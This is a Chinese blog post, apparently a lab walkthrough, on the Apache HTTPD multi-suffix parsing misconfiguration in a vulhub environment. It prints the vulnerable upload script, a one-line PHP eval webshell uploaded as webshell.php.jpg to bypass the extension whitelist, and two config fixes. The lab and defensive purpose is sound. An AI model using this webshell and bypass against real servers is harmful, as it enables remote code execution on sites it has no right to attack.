Apache HTTPD 多后缀解析漏洞

已于 2023-05-28 15:27:11 修改
阅读量326 收藏 1
点赞数 2
分类专栏: Web安全 文章标签: apache php web安全
于 2023-05-28 13:58:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/130911898
版权

文章目录

漏洞原理

Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件:

AddType text/html .html
AddLanguage zh-CN .cn

其给 .html 后缀增加了 media-type,值为 text/html ;给 .cn 后缀增加了语言,值为 zh-CN。此时,如果用户请求文件 index.cn.html,他将返回一个中文的html页面。以上就是Apache多后缀的特性。

该漏洞并不是 Apache 程序本身的问题,而是管理员配置不当造成。

# cat /root/vulhub/httpd/apache_parsing_vulnerability/conf/docker-php.conf 
//下面这一行有问题 ↓↓↓
AddHandler application/x-httpd-php .php

DirectoryIndex disabled
DirectoryIndex index.php index.html                                                         

<Directory /var/www/>
    Options -Indexes
    AllowOverride All
</Directory>

那么,在有多个后缀的情况下,只要一个文件含有 .php 后缀的文件即将被识别成 PHP 文件,没必要是最后一个后缀。
利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

漏洞环境

运行如下命令启动一个稳定版Apache,并附带PHP 7.3环境:

# cd vulhub/httpd/apache_parsing_vulnerability/
# docker-compose up -d
# docker-compose ps
             Name                           Command              State         Ports       
-------------------------------------------------------------------------------------------
apache_parsing_vulnerability_a   docker-php-entrypoint /bin      Up      0.0.0.0:80->80/tcp
pache_1                          ...

漏洞复现

在这里插入图片描述

查看源码,发现是一个基于白名单检测文件后缀的页面,但上传后并未重命名。
我们可以通过上传文件名为xxx.php.jpg,利用Apache解析漏洞进行getshell。

# cat /root/vulhub/httpd/apache_parsing_vulnerability/www/index.php
<?php

if (!empty($_FILES)):

$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
    die('Unsupported filetype uploaded.');
}

$new_name = __DIR__ . '/uploadfiles/' . $_FILES['file_upload']['name'];
if(!move_uploaded_file($_FILES['file_upload']['tmp_name'], $new_name)){
    die('Error uploading file - check destination is writeable.');
}

die('File uploaded successfully: ' . $new_name);

else:
?>
<form method="post" enctype="multipart/form-data">
    File: <input type="file" name="file_upload">
    <input type="submit">
</form>
<?php
endif;

上传一句话木马 webshell.php.jpg,其内容为:

<?php @eval($_POST["x"]) ?>

成功上传,页面返回了上传路径。
在这里插入图片描述

访问 http://192.168.1.103/uploadfiles/webshell.php.jpg,成功执行 phpinfo,也就是说该文件被解析为了 PHP 脚本。
在这里插入图片描述

漏洞修复

1、使用 SetHandler,写好正则

<FileMatch ".+\.php$">
SetHandler application/x-httpd-php
</FileMatch>

2、禁止 .php 这样的文件执行

<FileMatch ".+\.ph(p[3457]?|t|tml)\.">
Require all denied
</FileMatch>
Apache HTTPD后缀解析漏洞
不忘初心,护天下安全!
10-14 862
Apache HTTPD 支持一个文件拥有后缀,并为不同后缀执行不同的指令。比如,如下配置文件:其给后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。以上就是Apache后缀的特性。如果运维人员给.php后缀增加了处理器:那么,在有后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀
apache httpd后缀解析漏洞复现
WY92139010的博客
07-28 515
apache httpd后缀解析漏洞复现 一、漏洞描述 Apache Httpd支持一个文件拥有后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。 该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞 二、漏洞原理 由于管理员...
apache httpd 后缀解析漏洞
qq_70303095的博客
01-08 255
apache httpd 后缀解析漏洞
06 - vulhub - Apache HTTPD 后缀解析漏洞
2301_82241859的博客
04-12 901
漏洞原理漏洞复现漏洞利用验证漏洞利用是否成功修复建议漏洞名称:Apache HTTPD 后缀解析漏洞简介:httpdApache超文本传输协议(HTTP)服务器的主程序。被设计为一个独立运行的后台进程,它会建立一个处理请求的子进程或线程的池。Apache Httpd支持一个文件拥有后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析php文件。比如,如下配置文件:AddType text/html .htmlAddLanguage zh-CN .cn其
Apache HTTPD 后缀解析漏洞复现
记录笔记
04-15 2808
Apache HTTPD 后缀解析漏洞复现 Apache Httpd支持一个文件拥有后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞 由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有后缀的情况下,只要一个文件含有.php后缀的文件即将被识别
vulhub-httpd-apache_parsing_vulnerability
Ronin_qianmo的博客
07-27 486
1、漏洞描述 在有后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 2、漏洞原理 Apache HTTPD 支持一个文件拥有后缀,并为不同后缀执行不同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文
Apache HTTPD 后缀解析漏洞分析
灰太的表格的博客
06-05 245
Apache HTTPD 后缀解析漏洞 漏洞形成原因: Apache HTTPD 支持一个文件拥有后缀,并为不同后缀执行不同的指令。比如,如下配置文件 AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。也就是说增加的两个后缀都会发挥作用。 注:该漏洞apache版本和
NSSCTF实战:Apache HTTPD 后缀解析漏洞
weixin_52270928的博客
05-17 714
Apache文件解析漏洞涉及到一个Apache解析文件的特性,Apache默认一个文件可以有个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别。那么在有后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为php文件进行解析
漏洞复现之 Apache HTTPD 后缀解析漏洞
白帽子九一
12-25 448
漏洞简介:   Apache HTTPD 支持一个文件拥有后缀,并为不同后缀执行不同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。 以上就是Apache后缀的特性。如果运维人员给.php后缀增加了处理器: AddHandler ap
Apache HTTPD 换行解析漏洞Apache
最新发布
12-28
### Apache HTTPD 换行解析漏洞详情 Apache HTTPD 的 2.4.0 至 2.4.29 版本中存在一个严重的解析漏洞,编号为 CVE-2017-15715。此漏洞允许攻击者通过特定方式利用文件名中的换行符 (\x0A),使服务器错误地处理 PHP ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值